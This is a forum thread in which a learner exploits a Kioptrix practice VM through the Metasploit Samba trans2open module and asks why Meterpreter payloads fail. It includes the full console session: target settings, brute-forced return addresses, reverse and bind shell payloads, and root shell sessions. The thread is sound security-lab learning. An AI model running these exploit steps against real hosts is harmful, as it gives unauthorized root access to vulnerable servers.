Metasploit meterpreter

[nix]

so i created a vm and put kioptrix
ran metasploit and used the samba exploit (exploit/linux/samba/trans2open)

it was successfull
then tried to use meterpreter however it would not connect

i was able to get the shell session but not meterpreter
no errors, it just keeps on trying

anyone had simular issues?

[root-boy]

Can you show us a trace of what you did exactly and the output so we can have a better idea on your problem.

[nix]

msf > use exploit/linux/samba/trans2open

msf exploit(trans2open) > set RHOST 192.168.1.108
RHOST => 192.168.1.108
msf exploit(trans2open) > show options

Module options (exploit/linux/samba/trans2open):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.1.108 yes The target address
RPORT 139 yes The target port


Exploit target:

Id Name
-- ----
0 Samba 2.2.x - Bruteforce


msf exploit(trans2open) >
msf exploit(trans2open) > sessions

Active sessions
===============

No active sessions.

msf exploit(trans2open) > exploit
[*] Started reverse handler on 192.168.1.140:4444
[*] Trying return address 0xbffffdfc...
[*] Trying return address 0xbffffcfc...
[*] Trying return address 0xbffffbfc...
[*] Trying return address 0xbffffafc...
[*] Trying return address 0xbffff9fc...
[*] Command shell session 1 opened (192.168.1.140:4444 -> 192.168.1.108:32769) at 2013-05-20 10:34:05 -0400
[*] Command shell session 2 opened (192.168.1.140:4444 -> 192.168.1.108:32770) at 2013-05-20 10:34:06 -0400


exit
[*] 192.168.1.108 - Command shell session 2 closed. Reason: Died from EOFError
msf exploit(trans2open) > show payloads

Compatible Payloads
===================

Name Disclosure Date Rank Description
---- --------------- ---- -----------
generic/custom normal Custom Payload
generic/debug_trap normal Generic x86 Debug Trap
generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline
generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline
generic/tight_loop normal Generic x86 Tight Loop
linux/x86/adduser normal Linux Add User
linux/x86/chmod normal Linux Chmod
linux/x86/exec normal Linux Execute Command
linux/x86/meterpreter/bind_ipv6_tcp normal Linux Meterpreter, Bind TCP Stager (IPv6)
linux/x86/meterpreter/bind_nonx_tcp normal Linux Meterpreter, Bind TCP Stager
linux/x86/meterpreter/bind_tcp normal Linux Meterpreter, Bind TCP Stager
linux/x86/meterpreter/reverse_ipv6_tcp normal Linux Meterpreter, Reverse TCP Stager (IPv6)
linux/x86/meterpreter/reverse_nonx_tcp normal Linux Meterpreter, Reverse TCP Stager
linux/x86/meterpreter/reverse_tcp normal Linux Meterpreter, Reverse TCP Stager
linux/x86/metsvc_bind_tcp normal Linux Meterpreter Service, Bind TCP
linux/x86/metsvc_reverse_tcp normal Linux Meterpreter Service, Reverse TCP Inline
linux/x86/read_file normal Linux Read File
linux/x86/shell/bind_ipv6_tcp normal Linux Command Shell, Bind TCP Stager (IPv6)
linux/x86/shell/bind_nonx_tcp normal Linux Command Shell, Bind TCP Stager
linux/x86/shell/bind_tcp normal Linux Command Shell, Bind TCP Stager
linux/x86/shell/reverse_ipv6_tcp normal Linux Command Shell, Reverse TCP Stager (IPv6)
linux/x86/shell/reverse_nonx_tcp normal Linux Command Shell, Reverse TCP Stager
linux/x86/shell/reverse_tcp normal Linux Command Shell, Reverse TCP Stager
linux/x86/shell_bind_ipv6_tcp normal Linux Command Shell, Bind TCP Inline (IPv6)
linux/x86/shell_bind_tcp normal Linux Command Shell, Bind TCP Inline
linux/x86/shell_reverse_tcp normal Linux Command Shell, Reverse TCP Inline
linux/x86/shell_reverse_tcp2 normal Linux Command Shell, Reverse TCP Inline - Metasm Demo

msf exploit(trans2open) > set payload linux/x86/meterpreter/bind_tcp
payload => linux/x86/meterpreter/bind_tcp
msf exploit(trans2open) > show options

Module options (exploit/linux/samba/trans2open):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.1.108 yes The target address
RPORT 139 yes The target port


Payload options (linux/x86/meterpreter/bind_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
DebugOptions 0 no Debugging options for POSIX meterpreter
LPORT 4444 yes The listen port
PrependFork no Add a fork() / exit_group() (for parent) code
RHOST 192.168.1.108 no The target address


Exploit target:

Id Name
-- ----
0 Samba 2.2.x - Bruteforce


now when i run exploit i get the following...it keeps on going with trying to find a return address


msf exploit(trans2open) > exploit
[*] Started bind handler
[*] Trying return address 0xbffffdfc...
[*] Trying return address 0xbffffcfc...
[*] Trying return address 0xbffffbfc...
[*] Trying return address 0xbffffafc...
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Trying return address 0xbffff9fc...
[*] Sending stage (1126400 bytes) to 192.168.1.108
[*] Trying return address 0xbffff8fc...
[*] Trying return address 0xbffff7fc...
[*] Trying return address 0xbffff6fc...
[*] Trying return address 0xbffff5fc...
[*] Trying return address 0xbffff4fc...
[*] Trying return address 0xbffff3fc...
[*] Trying return address 0xbffff2fc...
[*] Trying return address 0xbffff1fc...
[*] Trying return address 0xbffff0fc...
[*] Trying return address 0xbfffeffc...
[*] Trying return address 0xbfffeefc...
[*] Trying return address 0xbfffedfc...
[*] Trying return address 0xbfffecfc...
[*] Trying return address 0xbfffebfc...
[*] Trying return address 0xbfffeafc...
[*] Trying return address 0xbfffe9fc...
[*] Trying return address 0xbfffe8fc...
[*] Trying return address 0xbfffe7fc...
[*] Trying return address 0xbfffe6fc...

[nix]

i even tried the Payload options (linux/x86/meterpreter/reverse_tcp):

and set the LHOST to my machine but i get the same thing

i'm able to get a shell and i'm fully logged in to the system as root but i can't get meterpreter to work.

[root-boy]

Looks like the shellcode is somehow broken, try to play with the encoders to use at run-time. Not sure if this will solve the problem.

[nix]

i'm not sure i understand...what do you mean the shellcode is broken? do you mean the payload?

thanks

Nix